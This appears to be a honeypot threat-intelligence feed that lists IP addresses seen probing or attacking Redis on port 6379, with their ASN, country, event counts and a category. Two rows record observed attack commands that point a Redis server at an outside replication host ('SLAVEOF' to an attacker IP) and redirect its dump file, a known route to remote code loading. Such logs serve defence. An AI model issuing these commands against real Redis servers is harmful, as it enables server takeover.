| IPv4 | 165.154.235.116 | Attacker IP • Redis / seen in Redishoneypot; events=34; ports=6379; cc=US; asn=142002; asn_org=Scloud Pte Ltd; redis_cmds=SLAVEOF NO ONE,SLAVEOF 128.199.146.217 60115,CONFIG SET dir /tmp/,config set rdbcompression no,config set dbfilename dump.rdb; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-04 | |
| IPv4 | 42.118.202.165 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=VN; asn=18403; asn_org=FPT Telecom Company; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 120.48.174.141 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 223.90.133.150 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=24445; asn_org=Henan Mobile Communications Co.,Ltd; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 146.56.175.64 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=KR; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 81.68.255.20 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 20.102.92.213 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 34.193.119.44 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 64.62.197.227 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 64.62.197.236 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 20.175.205.56 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 50.232.194.55 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 85.11.183.19 | Attacker IP • Redis / seen in Redishoneypot; events=28; ports=6379; cc=GB; asn=201002; asn_org=PebbleHost Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 172.202.118.45 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 115.190.97.5 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 8.221.136.6 | Attacker IP • Redis / seen in Redishoneypot; events=24; ports=6379; cc=JP; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 66.132.195.70 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 100.29.192.90 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-05 | |
| IPv4 | 18.221.179.104 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-05 | |
| IPv4 | 18.97.5.28 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 16.58.56.214 | Attacker IP • Redis / seen in Redishoneypot; events=86; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-04-05 | |
| IPv4 | 139.198.30.179 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=59078; asn_org=Yunify Technologies Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-05 | |
| IPv4 | 20.207.238.171 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 49.115.217.27 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-05 | |
| IPv4 | 103.21.150.246 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=VN; asn=38732; asn_org=CMC Telecom Infrastructure Company; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 36.133.118.248 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 180.76.114.78 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-05 | |
| IPv4 | 216.180.246.180 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 142.93.195.32 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 157.230.214.78 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 172.104.19.160 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-05 | |
| IPv4 | 64.62.156.94 | Attacker IP • Redis / seen in Redishoneypot; events=32; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 66.97.45.164 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=AR; asn=27823; asn_org=Dattatec.com; redis_cmd_hits=0 | scanning_host | 2026-04-05 | |
| IPv4 | 20.168.123.224 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 47.84.143.45 | Attacker IP • Redis / seen in Redishoneypot; events=25; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 172.202.117.171 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 198.235.24.73 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 198.74.62.88 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 85.113.129.96 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=34550; asn_org=LLC Intercon; redis_cmd_hits=0 | scanning_host | 2026-04-05 | |
| IPv4 | 20.88.179.169 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 14.116.219.149 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | bruteforce | 2026-04-05 | |
| IPv4 | 66.132.172.109 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-06 | |
| IPv4 | 66.132.172.231 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 71.6.134.233 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 111.118.251.133 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=55353; asn_org=RAJESH PATEL NET SERVICES PVT. LTD.; redis_cmd_hits=0 | bruteforce | 2026-04-06 | |
| IPv4 | 185.118.141.71 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=TR; asn=49805; asn_org=Berke FINCANCI; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 36.111.32.16 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 81.70.2.239 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 175.24.203.235 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 185.224.128.16 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-06 | |
| IPv4 | 39.96.175.203 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 95.215.0.144 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=RU; asn=44050; asn_org=Petersburg Internet Network ltd.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-06 | |
| IPv4 | 154.8.237.182 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 193.46.255.151 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RO; asn=47890; asn_org=Unmanaged Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 106.225.133.217 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=134238; asn_org=CHINANET Jiangx province IDC network; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 120.48.134.61 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 125.94.106.113 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 157.245.229.234 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-06 | |
| IPv4 | 39.105.202.192 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 65.49.1.10 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-06 | |
| IPv4 | 65.49.1.19 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 93.123.109.61 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BG; asn=48090; asn_org=Techoff Srv Limited; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 46.101.146.208 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 101.206.108.14 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 205.210.31.82 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-06 | |
| IPv4 | 157.230.235.169 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 120.48.151.68 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-06 | |
| IPv4 | 106.13.124.241 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 192.241.130.89 | Attacker IP • Redis / seen in Redishoneypot; events=22; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 20.29.21.127 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 66.132.172.178 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 183.56.183.136 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 193.163.125.37 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 218.78.131.154 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4812; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 95.211.47.55 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=NL; asn=60781; asn_org=LeaseWeb Netherlands B.V.; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 180.76.52.82 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 45.95.147.229 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=NL; asn=49870; asn_org=Alsycon B.V.; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 47.96.228.248 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 65.49.1.182 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 65.49.1.185 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 66.132.195.144 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 176.65.132.181 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 180.232.31.146 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=PH; asn=9658; asn_org=Eastern Telecoms Phils., Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 20.215.88.213 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=PL; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 45.91.64.6 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=RU; asn=214664; asn_org=JSC Buduschee; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 104.248.58.73 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 20.121.46.221 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 20.64.106.39 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 46.161.50.109 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=RU; asn=34665; asn_org=Petersburg Internet Network ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 81.29.142.100 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 39.107.95.100 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 43.133.59.133 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=SG; asn=132203; asn_org=Tencent Building, Kejizhongyi Avenue; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 45.91.64.7 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=RU; asn=214664; asn_org=JSC Buduschee; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 14.18.118.84 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 220.181.1.163 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=23724; asn_org=IDC, China Telecommunications Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 52.21.227.35 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 198.235.24.41 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-07 | |
| IPv4 | 193.32.162.211 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RO; asn=47890; asn_org=Unmanaged Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-07 | |
| IPv4 | 34.228.104.231 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 71.6.232.20 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 202.121.66.3 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4538; asn_org=China Education and Research Network Center; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 3.129.187.38 | Attacker IP • Redis / seen in Redishoneypot; events=98; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L..2.7.....|..t .......curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-04-08 | |
| IPv4 | 66.132.186.206 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 20.175.198.133 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 180.76.58.237 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 20.171.8.86 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 194.163.170.77 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 101.206.108.12 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 20.65.154.237 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 143.198.116.102 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 120.205.80.220 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 93.123.109.124 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BG; asn=48090; asn_org=Techoff Srv Limited; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 137.184.154.63 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 157.230.209.253 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 43.99.20.132 | Attacker IP • Redis / seen in Redishoneypot; events=166; ports=6379; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 116.153.32.50 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 165.232.138.158 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 111.231.1.253 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-08 | |
| IPv4 | 64.23.153.205 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 125.88.205.65 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | bruteforce | 2026-04-08 | |
| IPv4 | 113.105.90.148 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 20.150.192.134 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 118.121.27.103 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 157.245.251.196 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 198.235.24.199 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 3.83.245.221 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 43.134.0.85 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=SG; asn=132203; asn_org=Tencent Building, Kejizhongyi Avenue; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 80.94.92.16 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RO; asn=47890; asn_org=Unmanaged Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-09 | |
| IPv4 | 66.132.195.74 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
| IPv4 | 123.129.223.75 | Attacker IP • Redis / seen in Redishoneypot; events=34; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmds=save,config set dbfilename root,SLAVEOF 8.217.32.175 7122,config set dir .,config set dbfilename dump.rdb; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-09 | |
| IPv4 | 20.75.43.113 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-09 | |
